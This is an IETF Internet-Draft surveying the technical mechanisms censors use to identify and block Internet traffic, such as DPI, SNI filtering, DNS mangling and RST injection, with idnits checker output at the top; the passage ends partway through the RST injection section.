idnits 2.17.1 draft-irtf-pearg-censorship-00.txt: Checking boilerplate required by RFC 5378 and the IETF Trust (see https://trustee.ietf.org/license-info): ---------------------------------------------------------------------------- No issues found here. Checking nits according to https://www.ietf.org/id-info/1id-guidelines.txt: ---------------------------------------------------------------------------- No issues found here. Checking nits according to https://www.ietf.org/id-info/checklist : ---------------------------------------------------------------------------- ** The document seems to lack a Security Considerations section. ** The document seems to lack an IANA Considerations section. (See Section 2.2 of https://www.ietf.org/id-info/checklist for how to handle the case when there are no actions for IANA.) -- The document has examples using IPv4 documentation addresses according to RFC6890, but does not use any IPv6 documentation addresses. Maybe there should be IPv6 examples, too? Miscellaneous warnings: ---------------------------------------------------------------------------- == The copyright year in the IETF Trust and authors Copyright Line does not match the current year -- The document date (August 23, 2019) is 1705 days in the past. Is this intentional? Checking references for intended status: Informational ---------------------------------------------------------------------------- -- Obsolete informational reference (is this intentional?): RFC 793 (Obsoleted by RFC 9293) Summary: 2 errors (**), 0 flaws (~~), 1 warning (==), 3 comments (--). Run idnits with the --verbose option for more detailed information about the items above. -------------------------------------------------------------------------------- 2 Network Working Group J. Hall 3 Internet-Draft CDT 4 Intended status: Informational M. Aaron 5 Expires: February 24, 2020 CU Boulder 6 S. Adams 7 CDT 8 B. Jones 9 N. Feamster 10 Princeton 11 August 23, 2019 13 A Survey of Worldwide Censorship Techniques 14 draft-irtf-pearg-censorship-00 16 Abstract 18 This document describes the technical mechanisms used by censorship 19 regimes around the world to block or impair Internet traffic. It 20 aims to make designers, implementers, and users of Internet protocols 21 aware of the properties being exploited and mechanisms used to censor 22 end-user access to information. This document makes no suggestions 23 on individual protocol considerations, and is purely informational, 24 intended to be a reference. 26 Status of This Memo 28 This Internet-Draft is submitted in full conformance with the 29 provisions of BCP 78 and BCP 79. 31 Internet-Drafts are working documents of the Internet Engineering 32 Task Force (IETF). Note that other groups may also distribute 33 working documents as Internet-Drafts. The list of current Internet- 34 Drafts is at https://datatracker.ietf.org/drafts/current/. 36 Internet-Drafts are draft documents valid for a maximum of six months 37 and may be updated, replaced, or obsoleted by other documents at any 38 time. It is inappropriate to use Internet-Drafts as reference 39 material or to cite them other than as "work in progress." 41 This Internet-Draft will expire on February 24, 2020. 43 Copyright Notice 45 Copyright (c) 2019 IETF Trust and the persons identified as the 46 document authors. All rights reserved. 48 This document is subject to BCP 78 and the IETF Trust's Legal 49 Provisions Relating to IETF Documents 50 (https://trustee.ietf.org/license-info) in effect on the date of 51 publication of this document. Please review these documents 52 carefully, as they describe your rights and restrictions with respect 53 to this document. Code Components extracted from this document must 54 include Simplified BSD License text as described in Section 4.e of 55 the Trust Legal Provisions and are provided without warranty as 56 described in the Simplified BSD License. 58 Table of Contents 60 1. Introduction . . . . . . . . . . . . . . . . . . . . . . . . 3 61 2. Technical Prescription . . . . . . . . . . . . . . . . . . . 3 62 3. Technical Identification . . . . . . . . . . . . . . . . . . 4 63 3.1. Points of Control . . . . . . . . . . . . . . . . . . . . 4 64 3.2. Application Layer . . . . . . . . . . . . . . . . . . . . 5 65 3.2.1. HTTP Request Header Identification . . . . . . . . . 5 66 3.2.2. HTTP Response Header Identification . . . . . . . . . 6 67 3.2.3. Instrumenting Content Providers . . . . . . . . . . . 7 68 3.2.4. Deep Packet Inspection (DPI) Identification . . . . . 8 69 3.3. Transport Layer . . . . . . . . . . . . . . . . . . . . . 10 70 3.3.1. Shallow Packet Inspection and TCP/IP Header 71 Identification . . . . . . . . . . . . . . . . . . . 10 72 3.3.2. Protocol Identification . . . . . . . . . . . . . . . 11 73 4. Technical Interference . . . . . . . . . . . . . . . . . . . 12 74 4.1. Application Layer . . . . . . . . . . . . . . . . . . . . 12 75 4.1.1. DNS Interference . . . . . . . . . . . . . . . . . . 12 76 4.2. Transport Layer . . . . . . . . . . . . . . . . . . . . . 14 77 4.2.1. Performance Degradation . . . . . . . . . . . . . . . 14 78 4.2.2. Packet Dropping . . . . . . . . . . . . . . . . . . . 15 79 4.2.3. RST Packet Injection . . . . . . . . . . . . . . . . 15 80 4.3. Multi-layer and Non-layer . . . . . . . . . . . . . . . . 16 81 4.3.1. Distributed Denial of Service (DDoS) . . . . . . . . 16 82 4.3.2. Network Disconnection or Adversarial Route 83 Announcement . . . . . . . . . . . . . . . . . . . . 17 84 5. Non-Technical Prescription . . . . . . . . . . . . . . . . . 18 85 6. Non-Technical Interference . . . . . . . . . . . . . . . . . 18 86 6.1. Self-Censorship . . . . . . . . . . . . . . . . . . . . . 18 87 6.2. Domain Name Reallocation . . . . . . . . . . . . . . . . 19 88 6.3. Server Takedown . . . . . . . . . . . . . . . . . . . . . 19 89 6.4. Notice and Takedown . . . . . . . . . . . . . . . . . . . 19 90 7. Contributors . . . . . . . . . . . . . . . . . . . . . . . . 19 91 8. Informative References . . . . . . . . . . . . . . . . . . . 20 92 Authors' Addresses . . . . . . . . . . . . . . . . . . . . . . . 29 94 1. Introduction 96 Censorship is where an entity in a position of power - such as a 97 government, organization, or individual - suppresses communication 98 that it considers objectionable, harmful, sensitive, politically 99 incorrect or inconvenient. (Although censors that engage in 100 censorship must do so through legal, military, or other means, this 101 document focuses largely on technical mechanisms used to achieve 102 network censorship.) 104 This document describes the technical mechanisms that censorship 105 regimes around the world use to block or degrade Internet traffic 106 (see [RFC7754] for a discussion of Internet blocking and filtering in 107 terms of implications for Internet architecture, rather than end-user 108 access to content and services). 110 We describe three elements of Internet censorship: prescription, 111 identification, and interference. Prescription is the process by 112 which censors determine what types of material they should block, 113 i.e. they decide to block a list of pornographic websites. 114 Identification is the process by which censors classify specific 115 traffic to be blocked or impaired, i.e. the censor blocks or impairs 116 all webpages containing "sex" in the title or traffic to 117 www.sex.example. Interference is the process by which the censor 118 intercedes in communication and prevents access to censored materials 119 by blocking access or impairing the connection. 121 2. Technical Prescription 123 Prescription is the process of figuring out what censors would like 124 to block [Glanville-2008]. Generally, censors aggregate information 125 "to block" in blacklists or using real-time heuristic assessment of 126 content [Ding-1999]. There are indications that online censors are 127 starting to use machine learning techniques as well [Tang-2016]. 129 There are typically three types of blacklists: Keyword, domain name, 130 or Internet Protocol (IP) address. Keyword and domain name blocking 131 take place at the application level (e.g. HTTP), whereas IP blocking 132 tends to take place using routing data in TCP/IP headers. The 133 mechanisms for building up these blacklists are varied. Censors can 134 purchase from private industry "content control" software, such as 135 SmartFilter, which allows filtering from broad categories that they 136 would like to block, such as gambling or pornography. In these 137 cases, these private services attempt to categorize every semi- 138 questionable website as to allow for meta-tag blocking (similarly, 139 they tune real-time content heuristic systems to map their 140 assessments onto categories of objectionable content). 142 Countries that are more interested in retaining specific political 143 control, a desire which requires swift and decisive action, often 144 have ministries or organizations, such as the Ministry of Industry 145 and Information Technology in China or the Ministry of Culture and 146 Islamic Guidance in Iran, which maintain their own blacklists. 148 3. Technical Identification 150 3.1. Points of Control 152 Internet censorship, necessarily, takes place over a network. 153 Network design gives censors a number of different points-of-control 154 where they can identify the content they are interested in filtering. 155 An important aspect of pervasive technical interception is the 156 necessity to rely on software or hardware to intercept the content 157 the censor is interested in. This requirement, the need to have the 158 interception mechanism located somewhere, logically or physically, 159 implicates various general points-of-control: 161 o *Internet Backbone:* If a censor controls the gateways into a 162 region, they can filter undesirable traffic that is traveling into 163 and out of the region by packet sniffing and port mirroring at the 164 relevant exchange points. Censorship at this point of control is 165 most effective at controlling the flow of information between a 166 region and the rest of the Internet, but is ineffective at 167 identifying content traveling between the users within a region. 169 o *Internet Service Providers:* Internet Service Providers are 170 perhaps the most natural point of control. They have a benefit of 171 being easily enumerable by a censor paired with the ability to 172 identify the regional and international traffic of all their 173 users. The censor's filtration mechanisms can be placed on an ISP 174 via governmental mandates, ownership, or voluntary/coercive 175 influence. 177 o *Institutions:* Private institutions such as corporations, 178 schools, and cyber cafes can put filtration mechanisms in place. 179 These mechanisms are occasionally at the request of a censor, but 180 are more often implemented to help achieve institutional goals, 181 such as to prevent the viewing of pornography on school computers. 183 o *Personal Devices:* Censors can mandate censorship software be 184 installed on the device level. This has many disadvantages in 185 terms of scalability, ease-of-circumvention, and operating system 186 requirements. The emergence of mobile devices exacerbate these 187 feasibility problems. 189 o *Services:* Application service providers can be pressured, 190 coerced, or legally required to censor specific content or flows 191 of data. Service providers naturally face incentives to maximize 192 their potential customer base and potential service shutdowns or 193 legal liability due to censorship efforts may seem much less 194 attractive than potentially excluding content, users, or uses of 195 their service. 197 o *Certificate Authorities:* Authorities that issue 198 cryptographically secured resources can be a significant point of 199 control. Certificate Authorities that issue certificates to 200 domain holders for TLS/HTTPS or Regional/Local Internet Registries 201 that issue Route Origination Authorizations to BGP operators can 202 be forced to issue rogue certificates that may allow compromises 203 in confidentiality guarantees - allowing censorship software to 204 engage in identification and interference where not possible 205 before - or integrity guarantees - allowing, for example, 206 adversarial routing of traffic. 208 o *Content Distribution Networks (CDNs):* CDNs seek to collapse 209 network topology in order to better locate content closer to the 210 service's users in order to improve quality of service. These can 211 be powerful points of control for censors, especially if the 212 location of a CDN results in easier interference. 214 At all levels of the network hierarchy, the filtration mechanisms 215 used to detect undesirable traffic are essentially the same: a censor 216 sniffs transmitting packets and identifies undesirable content, and 217 then uses a blocking or shaping mechanism to prevent or impair 218 access. Identification of undesirable traffic can occur at the 219 application, transport, or network layer of the IP stack. Censors 220 are almost always concerned with web traffic, so the relevant 221 protocols tend to be filtered in predictable ways. For example, a 222 subversive image would always make it past a keyword filter, but the 223 IP address of the site serving the image may be blacklisted when 224 identified as a provider of undesirable content. 226 3.2. Application Layer 228 3.2.1. HTTP Request Header Identification 230 An HTTP header contains a lot of useful information for traffic 231 identification; although "host" is the only required field in an HTTP 232 request header (for HTTP/1.1 and later), an HTTP method field is 233 necessary to do anything useful. As such, "method" and "host" are 234 the two fields used most often for ubiquitous censorship. A censor 235 can sniff traffic and identify a specific domain name (host) and 236 usually a page name (GET /page) as well. This identification 237 technique is usually paired with TCP/IP header identification (see 238 Section 3.3.1) for a more robust method. 240 *Tradeoffs:* Request Identification is a technically straight-forward 241 identification method that can be easily implemented at the Backbone 242 or ISP level. The hardware needed for this sort of identification is 243 cheap and easy-to-acquire, making it desirable when budget and scope 244 are a concern. HTTPS will encrypt the relevant request and response 245 fields, so pairing with TCP/IP identification (see Section 3.3.1) is 246 necessary for filtering of HTTPS. However, some countermeasures such 247 as URL obfuscation [RSF-2005] can trivially defeat simple forms of 248 HTTP Request Header Identification. 250 *Empirical Examples:* Studies exploring censorship mechanisms have 251 found evidence of HTTP header/ URL filtering in many countries, 252 including Bangladesh, Bahrain, China, India, Iran, Malaysia, 253 Pakistan, Russia, Saudi Arabia, South Korea, Thailand, and Turkey 254 [Verkamp-2012] [Nabi-2013] [Aryan-2012]. Commercial technologies 255 such as the McAfee SmartFilter and NetSweeper are often purchased by 256 censors [Dalek-2013]. These commercial technologies use a 257 combination of HTTP Request Identification and TCP/IP Header 258 Identification to filter specific URLs. Dalek et al. and Jones et 259 al. identified the use of these products in the wild [Dalek-2013] 260 [Jones-2014]. 262 3.2.2. HTTP Response Header Identification 264 While HTTP Request Header Identification relies on the information 265 contained in the HTTP request from client to server, response 266 identification uses information sent in response by the server to 267 client to identify undesirable content. 269 *Tradeoffs:* As with HTTP Request Header Identification, the 270 techniques used to identify HTTP traffic are well-known, cheap, and 271 relatively easy to implement, but is made useless by HTTPS, because 272 the response in HTTPS is encrypted, including headers. 274 The response fields are also less helpful for identifying content 275 than request fields, as "Server" could easily be identified using 276 HTTP Request Header identification, and "Via" is rarely relevant. 277 HTTP Response censorship mechanisms normally let the first n packets 278 through while the mirrored traffic is being processed; this may allow 279 some content through and the user may be able to detect that the 280 censor is actively interfering with undesirable content. 282 *Empirical Examples:* In 2009, Jong Park et al. at the University of 283 New Mexico demonstrated that the Great Firewall of China (GFW) has 284 used this technique [Crandall-2010]. However, Jong Park et al. found 285 that the GFW discontinued this practice during the course of the 286 study. Due to the overlap in HTTP response filtering and keyword 287 filtering (see Section 3.2.3), it is likely that most censors rely on 288 keyword filtering over TCP streams instead of HTTP response 289 filtering. 291 3.2.3. Instrumenting Content Providers 293 In addition to censorship by the state, many governments pressure 294 content providers to censor themselves. Due to the extensive reach 295 of government censorship, we need to define content provider as any 296 service that provides utility to users, including everything from web 297 sites to locally installed programs. The defining factor of keyword 298 identification by content providers is the choice of content 299 providers to detect restricted terms on their platform. The terms to 300 look for may be provided by the government or the content provider 301 may be expected to come up with their own list. 303 *Tradeoffs:* By instrumenting content providers to identify 304 restricted content, the censor can gain new information at the cost 305 of political capital with the companies it forces or encourages to 306 participate in censorship. For example, the censor can gain insight 307 about the content of encrypted traffic by coercing web sites to 308 identify restricted content, but this may drive away potential 309 investment. Coercing content providers may encourage self- 310 censorship, an additional advantage for censors. The tradeoffs for 311 instrumenting content providers are highly dependent on the content 312 provider and the requested assistance. 314 *Empirical Examples:* Researchers have discovered keyword 315 identification by content providers on platforms ranging from instant 316 messaging applications [Senft-2013] to search engines [Rushe-2015] 317 [Cheng-2010] [Whittaker-2013] [BBC-2013] [Condliffe-2013]. To 318 demonstrate the prevalence of this type of keyword identification, we 319 look to search engine censorship. 321 Search engine censorship demonstrates keyword identification by 322 content providers and can be regional or worldwide. Implementation 323 is occasionally voluntary, but normally is based on laws and 324 regulations of the country a search engine is operating in. The 325 keyword blacklists are most likely maintained by the search engine 326 provider. China is known to require search engine providers to 327 "voluntarily" maintain search term blacklists to acquire/keep an 328 Internet content provider (ICP) license [Cheng-2010]. It is clear 329 these blacklists are maintained by each search engine provider based 330 on the slight variations in the intercepted searches [Zhu-2011] 331 [Whittaker-2013]. The United Kingdom has been pushing search engines 332 to self-censor with the threat of litigation if they don't do it 333 themselves: Google and Microsoft have agreed to block more than 334 100,000 queries in U.K. to help combat abuse [BBC-2013] 335 [Condliffe-2013]. 337 Depending on the output, search engine keyword identification may be 338 difficult or easy to detect. In some cases specialized or blank 339 results provide a trivial enumeration mechanism, but more subtle 340 censorship can be difficult to detect. In February 2015, Microsoft's 341 search engine, Bing, was accused of censoring Chinese content outside 342 of China [Rushe-2015] because Bing returned different results for 343 censored terms in Chinese and English. However, it is possible that 344 censorship of the largest base of Chinese search users, China, biased 345 Bing's results so that the more popular results in China (the 346 uncensored results) were also more popular for Chinese speakers 347 outside of China. 349 3.2.4. Deep Packet Inspection (DPI) Identification 351 Deep Packet Inspection has become computationally feasible as a 352 censorship mechanism in recent years [Wagner-2009]. Unlike other 353 techniques, DPI reassembles network flows to examine the application 354 "data" section, as opposed to only the header, and is therefore often 355 used for keyword identification. DPI also differs from other 356 identification technologies because it can leverage additional packet 357 and flow characteristics, i.e. packet sizes and timings, to identify 358 content. To prevent substantial quality of service (QoS) impacts, 359 DPI normally analyzes a copy of data while the original packets 360 continue to be routed. Typically, the traffic is split using either 361 a mirror switch or fiber splitter, and analyzed on a cluster of 362 machines running Intrusion Detection Systems (IDS) configured for 363 censorship. 365 *Tradeoffs:* DPI is one of the most expensive identification 366 mechanisms and can have a large QoS impact [Porter-2010]. When used 367 as a keyword filter for TCP flows, DPI systems can cause also major 368 overblocking problems. Like other techniques, DPI is less useful 369 against encrypted data, though DPI can leverage unencrypted elements 370 of an encrypted data flow (e.g., the Server Name Indicator (SNI) sent 371 in the clear for TLS) or statistical information about an encrypted 372 flow (e.g., video takes more bandwidth than audio or textual forms of 373 communication) to identify traffic. 375 Other kinds of information can be inferred by comparing certain 376 unencrypted elements exchanged during TLS handshakes to similar data 377 points from known sources. This practice, called TLS fingerprinting, 378 allows a probabilistic identification of a party's operating system, 379 browser, or application based on a comparison of the specific 380 combinations of TLS version, ciphersuites, compression options, etc. 382 sent in the ClientHello message to similar signatures found in 383 unencrypted traffic [Husak-2016]. 385 Despite these problems, DPI is the most powerful identification 386 method and is widely used in practice. The Great Firewall of China 387 (GFW), the largest censorship system in the world, has used DPI to 388 identify restricted content over HTTP and DNS and inject TCP RSTs and 389 bad DNS responses, respectively, into connections [Crandall-2010] 390 [Clayton-2006] [Anonymous-2014]. 392 *Empirical Examples:* Several studies have found evidence of DPI 393 being used to censor content and tools. Clayton et al. Crandal et 394 al., Anonymous, and Khattak et al., all explored the GFW and Khattak 395 et al. even probed the firewall to discover implementation details 396 like how much state it stores [Crandall-2010] [Clayton-2006] 397 [Anonymous-2014] [Khattak-2013]. The Tor project claims that China, 398 Iran, Ethiopia, and others must have used DPI to block the obsf2 399 protocol [Wilde-2012]. Malaysia has been accused of using targeted 400 DPI, paired with DDoS, to identify and subsequently knockout pro- 401 opposition material [Wagstaff-2013]. It also seems likely that 402 organizations not so worried about blocking content in real-time 403 could use DPI to sort and categorically search gathered traffic using 404 technologies such as NarusInsight [Hepting-2011]. 406 3.2.4.1. Server Name Indication 408 In encrypted connections using Transport Layer Security (TLS), there 409 may be servers that host multiple "virtual servers" at a give network 410 address, and the client will need to specify in the (unencrypted) 411 Client Hello message which domain name it seeks to connect to (so 412 that the server can respond with the appropriate TLS certificate) 413 using the Server Name Indication (SNI) TLS extension [RFC6066]. 414 Since SNI is sent in the clear, censors and filtering software can 415 use it as a basis for blocking, filtering, or impairment by dropping 416 connections to domains that match prohibited content (e.g., 417 bad.foo.example may be censored while good.foo.example is not) 418 [Shbair-2015]. 420 Domain fronting has been one popular way to avoid identification by 421 censors [Fifield-2015]. To avoid identification by censors, 422 applications using domain fronting put a different domain name in the 423 SNI extension than the one encrypted by HTTPS. The visible SNI would 424 indicate an unblocked domain, while the blocked domain remains hidden 425 in the encrypted application header. Some encrypted messaging 426 services relied on domain fronting to enable their provision in 427 countries employing SNI-based filtering. These services used the 428 cover provided by domains for which blocking at the domain level 429 would be undesirable to hide their true domain names. However, the 430 companies holding the most popular domains have since reconfigured 431 their software to prevent this practice. It may be possible to 432 achieve similar results using potential future options to encrypt SNI 433 in TLS 1.3. 435 *Tradeoffs:* Some clients do not send the SNI extension (e.g., 436 clients that only support versions of SSL and not TLS) or will fall 437 back to SSL if a TLS connection fails, rendering this method 438 ineffective. In addition, this technique requires deep packet 439 inspection techniques that can be computationally and 440 infrastructurally expensive and improper configuration of an SNI- 441 based block can result in significant overblocking, e.g., when a 442 second-level domain like populardomain.example is inadvertently 443 blocked. In the case of encrypted SNI, pressure to censor may 444 transfer to other points of intervention, such as content and 445 application providers. 447 *Empirical Examples:* While there are many examples of security firms 448 that offer SNI-based filtering [Trustwave-2015] [Sophos-2015] 449 [Shbair-2015], the government of South Korea was recently observed 450 using SNI-based filtering. Cite to Gatlan 451 https://www.bleepingcomputer.com/news/security/south-korea-is- 452 censoring-the-internet-by-snooping-on-sni-traffic/ 454 3.3. Transport Layer 456 3.3.1. Shallow Packet Inspection and TCP/IP Header Identification 458 Of the various shallow packet inspection methods, TCP/IP Header 459 Identification is the most pervasive, reliable, and predictable type 460 of identification. TCP/IP headers contain a few invaluable pieces of 461 information that must be transparent for traffic to be successfully 462 routed: destination and source IP address and port. Destination and 463 Source IP are doubly useful, as not only does it allow a censor to 464 block undesirable content via IP blacklisting, but also allows a 465 censor to identify the IP of the user making the request. Port is 466 useful for whitelisting certain applications. 468 *Trade-offs:* TCP/IP identification is popular due to its simplicity, 469 availability, and robustness. 471 TCP/IP identification is trivial to implement, but is difficult to 472 implement in backbone or ISP routers at scale, and is therefore 473 typically implemented with DPI. Blacklisting an IP is equivalent to 474 installing a /32 route on a router and due to limited flow table 475 space, this cannot scale beyond a few thousand IPs at most. IP 476 blocking is also relatively crude, leading to overblocking, and 477 cannot deal with some services like Content Distribution Networks 478 (CDN), that host content at hundreds or thousands of IP addresses. 479 Despite these limitations, IP blocking is extremely effective because 480 the user needs to proxy their traffic through another destination to 481 circumvent this type of identification. 483 Port-blocking is generally not useful because many types of content 484 share the same port and it is possible for censored applications to 485 change their port. For example, most HTTP traffic goes over port 80, 486 so the censor cannot differentiate between restricted and allowed 487 content solely on the basis of port. Port whitelisting is 488 occasionally used, where a censor limits communication to approved 489 ports, such as 80 for HTTP traffic and is most effective when used in 490 conjunction with other identification mechanisms. For example, a 491 censor could block the default HTTPS port, port 443, thereby forcing 492 most users to fall back to HTTP. 494 3.3.2. Protocol Identification 496 Censors sometimes identify entire protocols to be blocked using a 497 variety of traffic characteristics. For example, Iran impairs the 498 performance of HTTPS traffic, a protocol that prevents further 499 analysis, to encourage users to switch to HTTP, a protocol that they 500 can analyze [Aryan-2012]. A simple protocol identification would be 501 to recognize all TCP traffic over port 443 as HTTPS, but more 502 sophisticated analysis of the statistical properties of payload data 503 and flow behavior, would be more effective, even when port 443 is not 504 used [Hjelmvik-2010] [Sandvine-2014]. 506 If censors can detect circumvention tools, they can block them, so 507 censors like China are extremely interested in identifying the 508 protocols for censorship circumvention tools. In recent years, this 509 has devolved into an arms race between censors and circumvention tool 510 developers. As part of this arms race, China developed an extremely 511 effective protocol identification technique that researchers call 512 active probing or active scanning. 514 In active probing, the censor determines whether hosts are running a 515 circumvention protocol by trying to initiate communication using the 516 circumvention protocol. If the host and the censor successfully 517 negotiate a connection, then the censor conclusively knows that host 518 is running a circumvention tool. China has used active scanning to 519 great effect to block Tor [Winter-2012]. 521 *Trade-offs:* Protocol Identification necessarily only provides 522 insight into the way information is traveling, and not the 523 information itself. 525 Protocol identification is useful for detecting and blocking 526 circumvention tools, like Tor, or traffic that is difficult to 527 analyze, like VoIP or SSL, because the censor can assume that this 528 traffic should be blocked. However, this can lead to over-blocking 529 problems when used with popular protocols. These methods are 530 expensive, both computationally and financially, due to the use of 531 statistical analysis, and can be ineffective due to its imprecise 532 nature. 534 *Empirical Examples:* Protocol identification can be easy to detect 535 if it is conducted in real time and only a particular protocol is 536 blocked, but some types of protocol identification, like active 537 scanning, are much more difficult to detect. Protocol identification 538 has been used by Iran to identify and throttle SSH traffic to make it 539 unusable [Anonymous-2007] and by China to identify and block Tor 540 relays [Winter-2012]. Protocol Identification has also been used for 541 traffic management, such as the 2007 case where Comcast in the United 542 States used RST injection to interrupt BitTorrent Traffic 543 [Winter-2012]. 545 4. Technical Interference 547 4.1. Application Layer 549 4.1.1. DNS Interference 551 There are a variety of mechanisms that censors can use to block or 552 filter access to content by altering responses from the DNS 553 [AFNIC-2013] [ICANN-SSAC-2012], including blocking the response, 554 replying with an error message, or responding with an incorrect 555 address. 557 "DNS mangling" is a network-level technique where an incorrect IP 558 address is returned in response to a DNS query to a censored 559 destination. An example of this is what some Chinese networks do (we 560 are not aware of any other wide-scale uses of mangling). On those 561 Chinese networks, every DNS request in transit is examined 562 (presumably by network inspection technologies such as DPI) and, if 563 it matches a censored domain, a false response is injected. End 564 users can see this technique in action by simply sending DNS requests 565 to any unused IP address in China (see example below). If it is not 566 a censored name, there will be no response. If it is censored, an 567 erroneous response will be returned. For example, using the command- 568 line dig utility to query an unused IP address in China of 192.0.2.2 569 for the name "www.uncensored.example" compared with 570 "www.censored.example" (censored at the time of writing), we get an 571 erroneous IP address "198.51.100.0" as a response: 573 % dig +short +nodnssec @192.0.2.2 A www.uncensored.example 574 ;; connection timed out; no servers could be reached 576 % dig +short +nodnssec @192.0.2.2 A www.censored.example 577 198.51.100.0 579 There are also cases of what is colloquially called "DNS lying", 580 where a censor mandates that the DNS responses provided - by an 581 operator of a recursive resolver such as an Internet access provider 582 - be different than what authoritative resolvers would provide 583 [Bortzmayer-2015]. 585 DNS cache poisoning refers to a mechanism where a censor interferes 586 with the response sent by an authoritative DNS resolver to a 587 recursive resolver by responding more quickly than the authoritative 588 resolver can respond with an alternative IP address [Halley-2008]. 589 Cache poisoning occurs after the requested site's name servers 590 resolve the request and attempt to forward the true IP back to the 591 requesting device; on the return route the resolved IP is recursively 592 cached by each DNS server that initially forwarded the request. 593 During this caching process if an undesirable keyword is recognized, 594 the resolved IP is "poisoned" and an alternative IP (or NXDOMAIN 595 error) is returned more quickly than the upstream resolver can 596 respond, causing an erroneous IP address to be cached (and 597 potentially recursively so). The alternative IPs usually direct to a 598 nonsense domain or a warning page. Alternatively, Iranian censorship 599 appears to prevent the communication en-route, preventing a response 600 from ever being sent [Aryan-2012]. 602 *Trade-offs:* These forms of DNS interference require the censor to 603 force a user to traverse a controlled DNS hierarchy (or intervening 604 network on which the censor serves as a Active Pervasive Attacker 605 [RFC7624] to rewrite DNS responses) for the mechanism to be 606 effective. It can be circumvented by a technical savvy user that 607 opts to use alternative DNS resolvers (such as the public DNS 608 resolvers provided by Google, OpenDNS, Telcomix, or FDN) or Virtual 609 Private Network technology. DNS mangling and cache poisoning also 610 imply returning an incorrect IP to those attempting to resolve a 611 domain name, but in some cases the destination may be technically 612 accessible; over HTTP, for example, the user may have another method 613 of obtaining the IP address of the desired site and may be able to 614 access it if the site is configured to be the default server 615 listening at this IP address. Target blocking has also been a 616 problem, as occasionally users outside of the censors region will be 617 directed through DNS servers or DNS-rewriting network equipment 618 controlled by a censor, causing the request to fail. The ease of 619 circumvention paired with the large risk of content blocking and 620 target blocking make DNS interference a partial, difficult, and less 621 than ideal censorship mechanism. Additionally, the above mechanisms 622 rely on DNSSEC not being deployed or DNSSEC validation not being 623 active on the client or recursive resolver. 625 *Empirical Examples:* DNS interference, when properly implemented, is 626 easy to identify based on the shortcomings identified above. Turkey 627 relied on DNS interference for its country-wide block of websites 628 such Twitter and YouTube for almost week in March of 2014 but the 629 ease of circumvention resulted in an increase in the popularity of 630 Twitter until Turkish ISPs implementing an IP blacklist to achieve 631 the governmental mandate [Zmijewki-2014]. Ultimately, Turkish ISPs 632 started hijacking all requests to Google and Level 3's international 633 DNS resolvers [Zmijewki-2014]. DNS interference, when incorrectly 634 implemented, has resulted in some of the largest "censorship 635 disasters". In January 2014, China started directing all requests 636 passing through the Great Fire Wall to a single domain, 637 dongtaiwang.com, due to an improperly configured DNS poisoning 638 attempt; this incident is thought to be the largest Internet-service 639 outage in history [AFP-2014] [Anon-SIGCOMM12]. Countries such as 640 China, Iran, Turkey, and the United States have discussed blocking 641 entire TLDs as well, but only Iran has acted by blocking all Israeli 642 (.il) domains [Albert-2011]. 644 4.2. Transport Layer 646 4.2.1. Performance Degradation 648 While other interference techniques outlined in this section mostly 649 focus on blocking or preventing access to content, it can be an 650 effective censorship strategy in some cases to not entirely block 651 access to a given destination, or service but instead degrade the 652 performance of the relevant network connection. The resulting user 653 experience for a site or service under performance degradation can be 654 so bad that users opt to use a different site, service, or method of 655 communication, or may not engage in communication at all if there are 656 no alternatives. Traffic shaping techniques that rate-limit the 657 bandwidth available to certain types of traffic is one example of a 658 performance degradation. 660 *Trade offs:* While implementing a performance degradation will not 661 always eliminate the ability of people to access a desire resource, 662 it may force them to use other means of communication where 663 censorship (or surveillance) is more easily accomplished. 665 *Empirical Examples:* Iran has been known to shape the bandwidth 666 available to HTTPS traffic to encourage unencrypted HTTP traffic 667 [Aryan-2012]. 669 4.2.2. Packet Dropping 671 Packet dropping is a simple mechanism to prevent undesirable traffic. 672 The censor identifies undesirable traffic and chooses to not properly 673 forward any packets it sees associated with the traversing 674 undesirable traffic instead of following a normal routing protocol. 675 This can be paired with any of the previously described mechanisms so 676 long as the censor knows the user must route traffic through a 677 controlled router. 679 *Trade offs:* Packet Dropping is most successful when every 680 traversing packet has transparent information linked to undesirable 681 content, such as a Destination IP. One downside Packet Dropping 682 suffers from is the necessity of blocking all content from otherwise 683 allowable IPs based on a single subversive sub-domain; blogging 684 services and github repositories are good examples. China famously 685 dropped all github packets for three days based on a single 686 repository hosting undesirable content [Anonymous-2013]. The need to 687 inspect every traversing packet in close to real time also makes 688 Packet Dropping somewhat challenging from a QoS perspective. 690 *Empirical Examples:* Packet Dropping is a very common form of 691 technical interference and lends itself to accurate detection given 692 the unique nature of the time-out requests it leaves in its wake. 693 The Great Firewall of China has been observed using packet dropping 694 as one of its primary mechanisms of technical censorship 695 [Ensafi-2013]. Iran has also used Packet Dropping as the mechanisms 696 for throttling SSH [Aryan-2012]. These are but two examples of a 697 ubiquitous censorship practice. 699 4.2.3. RST Packet Injection 701 Packet injection, generally, refers to a man-in-the-middle (MITM) 702 network interference technique that spoofs packets in an established 703 traffic stream. RST packets are normally used to let one side of TCP 704 connection know the other side has stopped sending information, and 705 thus the receiver should close the connection. RST Packet Injection 706 is a specific type of packet injection attack that is used to 707 interrupt an established stream by sending RST packets to both sides 708 of a TCP connection; as each receiver thinks the other has dropped 709 the connection, the session is terminated. 711 *Trade-offs:* RST Packet Injection has a few advantages that make it 712 extremely popular as a censorship technique. RST Packet Injection is 713 an out-of-band interference mechanism, allowing the avoidance of the 714 the QoS bottleneck one can encounter with inline techniques such as 715 Packet Dropping. This out-of-band property allows a censor to 716 inspect a copy of the information, usually mirrored by an optical 717 splitter, making it an ideal pairing for DPI and Protocol 718 Identification [Weaver-2009] (this asynchronous version of a MITM is 719 often called a Man-on-the-Side (MOTS)). RST Packet Injection also 720 has the advantage of only requiring one of the two endpoints to 721 accept the spoofed packet for the connection to be interrupted. 723 The difficult part of RST Packet Injection is spoofing "enough" 724 correct information to ensure one end-point accepts a RST packet as 725 legitimate; this generally implies a correct IP, port, and (TCP) 726 sequence number. Sequence number is the hardest to get correct, as 727 [RFC0793] specifies an RST Packet should be in-sequence to be 728 accepted, although the RFC also recommends allowing in-window packets 729 as "good enough". This in-window recommendation is important, as if 730 it is implemented it allows for successful Blind RST Injection 731 attacks [Netsec-2011]. When in-window sequencing is allowed, It is 732 trivial to conduct a Blind RST Injection, a blind injection implies 733 the censor doesn't know any sensitive (encrypted) sequencing 734 information about the TCP stream they are injecting into, they can 735 simply enumerate the ~70000 possible windows; this is particularly 736 useful for interrupting encrypted/obfuscated protocols such as SSH or 737 Tor. RST Packet Injection relies on a stateful network, making it 738 useless against UDP connections. RST Packet Injection is among the 739 most popular censorship techniques used today given its versatile 740 nature and effectiveness against all types of TCP traffic. 742 *Empirical Examples:* RST Packet Injection, as mentioned 